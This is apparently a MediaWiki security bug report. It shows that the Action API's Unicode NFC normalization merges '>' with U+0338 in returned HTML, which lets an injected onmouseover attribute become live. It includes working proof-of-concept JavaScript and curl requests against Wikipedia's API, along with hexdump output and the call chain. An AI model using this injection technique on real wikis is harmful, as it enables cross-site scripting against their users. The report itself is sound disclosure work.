TL;DR
The MediaWiki Action API converts output to Unicode Normalization Form C. Unfortunately, for HTML strings this is unsafe, because the sequence ‘>’ + U+0338 gets replaced by U+226F, breaking the tag end and potentially allowing injection attacks.
Steps to reproduce
- Visit any wiki page, such that mw.Api() has loaded
- Open the console
- Perform any mw.Api call that returns HTML in which you control the first character of an element's content, and make that character U+0338 COMBINING LONG SOLIDUS OVERLAY.
In other words, you want the API to send you some HTML that contains ‘>’ followed by U+0338.
For example, call { action: 'visualeditor', paction: 'parsefragment' } as follows:
const COMBINING_LONG_SOLIDUS = '\u0338';
new mw.Api().post( {
    action: 'visualeditor',
    paction: 'parsefragment',
    page: 'Test',
    wikitext: COMBINING_LONG_SOLIDUS + ' onmouseover="alert(42)" >content'
} ).done( ( data ) => {
    const content = data.visualeditor.content;
    // Inserting the returned HTML into the page makes the injected attribute live
    document.body.innerHTML = content;
    console.log( 'Content:', content );
} ).fail( ( err ) => console.error( err ) );
This can also be reproduced without JavaScript – note the missing > after id="mwAg":
$ curl -s -d action=visualeditor -d paction=parsefragment -d page=Test -d wikitext=$'\u0338 onmouseover="alert(42)" >content ' -d format=json https://en.wikipedia.org/w/api.php | jq -r .visualeditor.content | hexdump -C
00000000  3c 70 20 69 64 3d 22 6d  77 41 67 22 e2 89 af 20  |<p id="mwAg"... |
00000010  6f 6e 6d 6f 75 73 65 6f  76 65 72 3d 22 61 6c 65  |onmouseover="ale|
00000020  72 74 28 34 32 29 22 20  3e 63 6f 6e 74 65 6e 74  |rt(42)" >content|
00000030  20 3c 2f 70 3e 0a                                 | </p>.|
00000036
Compare this with a normal slash in the input:
$ curl -s -d action=visualeditor -d paction=parsefragment -d page=Test -d wikitext='/ onmouseover="alert(42)" >content ' -d format=json https://en.wikipedia.org/w/api.php | jq -r .visualeditor.content | hexdump -C
00000000  3c 70 20 69 64 3d 22 6d  77 41 67 22 3e 2f 20 6f  |<p id="mwAg">/ o|
00000010  6e 6d 6f 75 73 65 6f 76  65 72 3d 22 61 6c 65 72  |nmouseover="aler|
00000020  74 28 34 32 29 22 20 3e  63 6f 6e 74 65 6e 74 20  |t(42)" >content |
00000030  3c 2f 70 3e 0a                                    |</p>.|
00000035
Actual behaviour
The sequence ‘>’ + U+0338 gets replaced with the precomposed character U+226F ≯ NOT GREATER-THAN, because the API applies Unicode Normalization Form C. Surprisingly, this consumes the ‘>’ that closes the HTML tag, so the text that follows is parsed as attributes of that tag. This potentially allows a JavaScript injection attack, for instance:
'<p id="mwAg"\u226F onmouseover="alert(42)" >content</p>'
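The composition can be checked locally, without calling the API, using the standard String.prototype.normalize method. This is only a sketch of the normalization step in isolation: the variable names are illustrative, and it does not exercise any MediaWiki code.

```javascript
// The HTML as it should arrive: '>' closes the tag, then U+0338 starts the content.
const decomposed = '<p id="mwAg">\u0338 onmouseover="alert(42)" >content</p>';

// NFC composes '>' (U+003E) + U+0338 into the single character U+226F.
const composed = decomposed.normalize( 'NFC' );

console.log( composed.includes( '\u226f' ) ); // true
console.log( composed.includes( '>\u0338' ) ); // false
// One code unit shorter, because two characters were merged into one.
console.log( decomposed.length - composed.length ); // 1
// The first real '>' now comes after the injected attribute.
console.log( composed.indexOf( '>' ) > composed.indexOf( 'onmouseover' ) ); // true
```

The last check shows why the attribute becomes live: the parser keeps reading attributes until it reaches the ‘>’ that was originally part of the text content.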
Expected behaviour
The HTML arrives with the sequence ‘>’ + U+0338 intact.
'<p id="mwAg">\u0338 onmouseover="alert(42)" >content</p>'
Note that this is a regular '>' symbol closing the HTML tag, followed by a U+0338 ◌̸ COMBINING LONG SOLIDUS OVERLAY, such that the contents of the <p> tag are '\u0338 onmouseover="alert(42)" >content'
Debugging note
Both expected and actual output may look similar or identical when rendered in the console:
<p id="mwAg"≯ onmouseover="alert(42)" >content</p> # actual
<p id="mwAg"≯ onmouseover="alert(42)" >content</p> # expected
The best way to see for sure what’s there is to escape non-ASCII characters with a function:
// Replace every non-ASCII UTF-16 code unit with a \uXXXX escape
function showUnicode( text ) {
    return text.replace(
        /[^\x00-\x7F]/g,
        ( ch ) => '\\u' + ch.charCodeAt( 0 ).toString( 16 ).padStart( 4, '0' )
    );
}
const text = '<p id="mwAg"≯ onmouseover="alert(42)" >content</p>';
console.log( showUnicode( text ) );
// <p id="mwAg"\u226f onmouseover="alert(42)" >content</p>
Cause
The cause was identified by @dchan in the related ticket. The function MediaWiki::Api::ApiResult::validateValue does more than catch invalid UTF-8: it also applies Unicode Normalization Form C. Unfortunately, as we have seen, it is unsafe to do this on HTML strings if they might contain ‘>’ + U+0338. The call chain is:
MediaWiki::Api::ApiResult::addValue
MediaWiki::Api::ApiResult::validateValue
MediaWiki::Language::normalize
UtfNormal::Validator::cleanUp
normalizer_normalize( $string, Normalizer::FORM_C )
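To illustrate why normalizing an HTML string is unsafe, here is a minimal JavaScript sketch that reports whether NFC would change the number of syntax-significant ASCII characters in a string. The helper name nfcChangesHtmlSyntax and the choice of characters to check ('<', '>', '=') are assumptions made for illustration. It is not part of MediaWiki and is not a proposed fix.

```javascript
// Hypothetical helper (not a MediaWiki function): returns true if NFC
// normalization would change how many '<', '>' or '=' characters the
// string contains, meaning the HTML syntax may be altered.
function nfcChangesHtmlSyntax( html ) {
    const normalized = html.normalize( 'NFC' );
    // Count the occurrences of a single character in a string
    const count = ( s, ch ) => s.split( ch ).length - 1;
    return [ '<', '>', '=' ].some(
        ( ch ) => count( html, ch ) !== count( normalized, ch )
    );
}

console.log( nfcChangesHtmlSyntax( '<p>\u0338 x</p>' ) ); // true
console.log( nfcChangesHtmlSyntax( '<p>/ x</p>' ) ); // false
console.log( nfcChangesHtmlSyntax( '<p>e\u0301</p>' ) ); // false
```

The third call shows that ordinary composition inside text content (here 'e' + U+0301) is harmless. The problem arises only when a combining character follows a character that is part of the markup.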